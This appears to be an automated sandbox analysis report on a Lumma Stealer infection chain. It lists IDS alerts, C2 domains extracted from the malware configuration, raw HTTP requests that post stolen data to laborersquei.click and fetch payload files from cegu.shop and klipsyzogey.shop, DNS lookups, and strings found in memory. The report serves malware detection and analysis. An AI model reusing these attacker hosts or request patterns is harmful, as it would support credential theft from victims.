Source:	Binary string: %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%cuser + domain + host name too bigcompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAES_ASM -DVPAES_ASM -DBSAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0614000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
Source:	Binary string: CrashReportClient.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD078E000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr
Source:	Binary string: C:\work\mesa\git\mesa\build\windows-x86_64\gallium\targets\libgl-gdi\opengl32.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.2316088773.00000000032E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.10.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\709182	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\709182\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.16:49708 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49717 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49708 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.16:49713 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.16:49709 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49709 -> 172.67.166.49:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: laborersquei.click
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49719 -> 172.67.214.186:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49718 -> 185.161.251.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49714 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49715 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49710 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49717 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49708 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49709 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49716 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49713 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49712 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49711 -> 172.67.166.49:443
Source: Network traffic	Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 172.67.214.186:443 -> 192.168.2.16:49719

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OP2N2ST4JG5LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12809Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PW26DGQR6PK3HXLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15062Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J00HHUFWER406WDENMRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20429Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1ALGZ4CTARQPMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 637Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1RG2I12A0GZ9UYBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1565Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0HJAY2QJQ8EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1140Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KACTUHKC32X8JDQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1103Host: laborersquei.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: laborersquei.click
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipsyzogey.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipsyzogey.shop

Source: global traffic	DNS traffic detected: DNS query: MKEsavqGIoOOFKIkcwQOiuYAysc.MKEsavqGIoOOFKIkcwQOiuYAysc
Source: global traffic	DNS traffic detected: DNS query: laborersquei.click
Source: global traffic	DNS traffic detected: DNS query: cegu.shop
Source: global traffic	DNS traffic detected: DNS query: klipsyzogey.shop
Source: global traffic	DNS traffic detected: DNS query: dfgh.online

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: laborersquei.click

Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
Source: Lightweight.com, 00000017.00000003.2278853392.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.2278719622.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0P
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 0000001E.00000002.2321451025.0000000005724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.microsx
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1599000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://llvm.org/):
Source: installer_1.05_36.4.exe, 0000000C.00000000.1529422851.0000000000409000.00000002.00000001.01000000.00000008.sdmp, installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000001C.00000002.2156080772.000000000611A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Lightweight.com, 00000017.00000003.2278853392.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.2278719622.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, lang-1049.dll.10.dr, lang-1058.dll.10.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, lang-1049.dll.10.dr, opengl64.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr, installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000001C.00000002.2134794357.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2321451025.0000000005121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt0
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com.13.dr, Mf.20.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Lightweight.com, 00000017.00000000.1572086112.0000000000AE5000.00000002.00000001.01000000.00000009.sdmp, Lightweight.com, 00000017.00000003.1850647478.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Organization.20.dr, Lightweight.com.13.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: lang-1049.dll.10.dr, lang-1058.dll.10.dr	String found in binary or memory: http://www.avast.com0/
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.10.dr	String found in binary or memory: http://www.crossteccorp.com
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, lang-1049.dll.10.dr, opengl64.dll.10.dr, lang-1058.dll.10.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD047F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	String found in binary or memory: http://www.google.comDUMPREQFLUSHD:/build/
Source: powershell.exe, 0000001E.00000002.2367808691.0000000008D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.Ah
Source: installer_1.05_36.4.exe.10.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: opengl64.dll.10.dr	String found in binary or memory: http://www.unicode.org/copyright.html
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Lightweight.com, 00000017.00000003.1952094808.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000001C.00000002.2134794357.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2321451025.0000000005121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugs.freedesktop.org/enter_bug.cgi?product=Mesa
Source: Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Lightweight.com, 00000017.00000002.2304957335.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/
Source: Lightweight.com, 00000017.00000002.2304957335.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp, Lightweight.com, 00000017.00000002.2307418203.0000000003B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt
